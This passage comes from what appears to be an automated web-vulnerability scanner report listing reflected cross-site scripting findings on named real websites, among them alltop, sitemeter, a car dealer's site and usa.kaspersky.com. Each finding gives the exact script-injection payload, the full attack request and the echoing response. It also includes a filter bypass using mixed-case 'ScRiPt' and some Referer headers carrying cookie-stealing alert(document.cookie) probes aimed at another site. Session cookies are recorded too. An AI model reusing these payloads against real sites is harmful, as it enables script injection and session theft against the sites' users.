User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; alltop_v=eb8e1238e83a994c827243f20aced46d; alltop_r=2; sifrFetch=true; __qca=P0-1457044879-1302961854448; __utmz=160012002.1302961854.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=160012002.1443153480.1302961854.1302961854.1302961854.1; __utmc=160012002; __utmb=160012002.2.9.1302961854546; __qseg=Q_D|Q_T|Q_2891|Q_2360|Q_2349|Q_2346|Q_2340|Q_1659|Q_1286|Q_1155|Q_1154|Q_1153|Q_1151|Q_1150|Q_1149|Q_1148|Q_1147|Q_1145|Q_983|Q_982

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:51:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:51:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=065jkhrbmh85idvk74bpr630u0; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:51:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:51:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/favicon.ico32383"><script>alert(1)</script>e537a41bbed" method="post" accept-charset="utf-8">
...[SNIP]...

4.43. http://law.alltop.com/widget/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://law.alltop.com
Path:   /widget/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fa3b"><script>alert(1)</script>3c139cf78b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget2fa3b"><script>alert(1)</script>3c139cf78b0/?type=js HTTP/1.1
Host: law.alltop.com
Proxy-Connection: keep-alive
Referer: http://www.jamesprobinsonlaw.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 13:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Fri, 16-Apr-2010 13:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=vpc5m17i3plcmgqib9tk2rbp06; path=/; domain=.alltop.com
Expires: Sat, 16 Apr 2011 14:49:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT
Set-Cookie: alltop_v=4ca316e9121138d4d76ae9359c78da59; expires=Tue, 13-Apr-2021 13:49:07 GMT; path=/; domain=law.alltop.com
Set-Cookie: alltop_r=2; expires=Fri, 15-Jul-2011 13:49:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 930369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/widget2fa3b"><script>alert(1)</script>3c139cf78b0/?type=js" method="post" accept-charset="utf-8">
...[SNIP]...

4.44. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 6210f<script>alert(1)</script>d253288866b was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303045152447-372951&mboxPage=1303045152447-372951&mboxCount=1&mbox=mbx_company_landing6210f<script>alert(1)</script>d253288866b&mboxId=0&mboxTime=1303027152504&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fcompany&mboxReferrer=&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 215
Date: Sun, 17 Apr 2011 12:59:57 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_company_landing6210f<script>alert(1)</script>d253288866b',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303045152447-372951.17");

4.45. http://s25.sitemeter.com/js/counter.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s25.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18a21'%3balert(1)//a3344cc69fd was submitted in the site parameter. This input was echoed as 18a21';alert(1)//a3344cc69fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s25hadashot18a21'%3balert(1)//a3344cc69fd HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:35:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 17 Apr 2011 14:45:04 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s25hadashot18a21';alert(1)//a3344cc69fd', 's25.sitemeter.com', '');

var g_sLastCodeName = 's25hadashot18a21';alert(1)//a3344cc69fd';
// ]]>
...[SNIP]...

4.46. http://s25.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s25.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f79'%3balert(1)//80af3977918 was submitted in the site parameter. This input was echoed as 39f79';alert(1)//80af3977918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s25hadashot39f79'%3balert(1)//80af3977918 HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:35:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 17 Apr 2011 14:45:05 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s25hadashot39f79';alert(1)//80af3977918', 's25.sitemeter.com', '');

var g_sLastCodeName = 's25hadashot39f79';alert(1)//80af3977918';
// ]]>
...[SNIP]...

4.47. http://theautomaster.com/smartbrowse/ajax/new.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6c3"><script>alert(1)</script>d3cbc0a7a50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowseab6c3"><script>alert(1)</script>d3cbc0a7a50/ajax/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=true&showTrim=&showBodyStyle=true&showMileage=true&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f434b3b0a0a002d004d9ebf7ccb20d0; JSESSIONID=10ue49uec8ctq; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 17:04:30 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14533

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=theautomaster.com&amp;21=/smartbrowseab6c3"><script>alert(1)</script>d3cbc0a7a50/ajax/new.htm&amp;50=5f434b3b0a0a002d004d9ebf7ccb20d0&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-
...[SNIP]...

4.48. http://theautomaster.com/smartbrowse/ajax/new.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e37f"><script>alert(1)</script>2357d3fddc1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajax1e37f"><script>alert(1)</script>2357d3fddc1/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=true&showTrim=&showBodyStyle=true&showMileage=true&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f434b3b0a0a002d004d9ebf7ccb20d0; JSESSIONID=10ue49uec8ctq; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 17:04:42 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14533

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=theautomaster.com&amp;21=/smartbrowse/ajax1e37f"><script>alert(1)</script>2357d3fddc1/new.htm&amp;50=5f434b3b0a0a002d004d9ebf7ccb20d0&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&
...[SNIP]...

4.49. http://theautomaster.com/used-inventory/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /used-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4380"><script>alert(1)</script>7f92519afdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventoryf4380"><script>alert(1)</script>7f92519afdd/index.htm?reset=InventoryListing HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=111725121.1303003248.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; ssoid=610cf6690a0a002d004d9ebff580a7e7; JSESSIONID=1sdotl64whyrk; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE; __utma=111725121.1506997093.1302973362.1302973362.1303003248.2; __utmc=111725121; __utmb=111725121.14.5.1303003427103

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 01:41:05 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14691

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=7ddc8'-alert(document.cookie)-'4ac342c68e7&amp;20=theautomaster.com&amp;21=/used-inventoryf4380"><script>alert(1)</script>7f92519afdd/index.htm&amp;50=610cf6690a0a002d004d9ebff580a7e7&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.50. http://ts.istrack.com/trackingAPI.js [vti parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ts.istrack.com
Path:   /trackingAPI.js

Issue detail

The value of the vti request parameter is copied into the HTML document as plain text between tags. The payload 84994<script>alert(1)</script>651019c713b was submitted in the vti parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackingAPI.js?ai=1/b7YsF5/LZw+m6HdoJfHSWrtAPLOT1z&evt=20&ri=54028&ii=40200&vti=1c4WFQoBC2cAABF-Y28AAAAAACGeq@x@J8zrRG84994<script>alert(1)</script>651019c713b HTTP/1.1
Host: ts.istrack.com
Proxy-Connection: keep-alive
Referer: http://www.bitdefender.com/solutions/antivirus.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:59:29 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 114
Connection: close
Content-Type: text/javascript; charset=utf-8

ISVT_setCookie('isvt_visitor', '1c4WFQoBC2cAABF-Y28AAAAAACGeq@x@J8zrRG84994<script>alert(1)</script>651019c713b');

4.51. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420aa"><script>alert(1)</script>7e822a04924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?420aa"><script>alert(1)</script>7e822a04924=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:04:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045499"
Content-Type: text/html; charset=utf-8
Content-Length: 41098
Date: Sun, 17 Apr 2011 13:05:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?420aa"><script>alert(1)</script>7e822a04924=1" />
...[SNIP]...

4.52. http://usa.kaspersky.com/downloads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 111b7"-alert(1)-"57da2f5aecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads111b7"-alert(1)-"57da2f5aecf HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045201"
Content-Type: text/html; charset=utf-8
Content-Length: 30202
Date: Sun, 17 Apr 2011 13:00:04 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads111b7"-alert(1)-"57da2f5aecf";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.53. http://usa.kaspersky.com/downloads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /downloads85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 12:59:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045196"
Content-Type: text/html; charset=utf-8
Content-Length: 30299
Date: Sun, 17 Apr 2011 12:59:58 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07" />
...[SNIP]...

4.54. http://usa.kaspersky.com/downloads [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 213ed"><script>alert(1)</script>2b51f9931de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads?213ed"><script>alert(1)</script>2b51f9931de=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 12:59:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045186"
Content-Type: text/html; charset=utf-8
Content-Length: 53136
Date: Sun, 17 Apr 2011 12:59:48 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads?213ed"><script>alert(1)</script>2b51f9931de=1" />
...[SNIP]...

4.55. http://usa.kaspersky.com/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

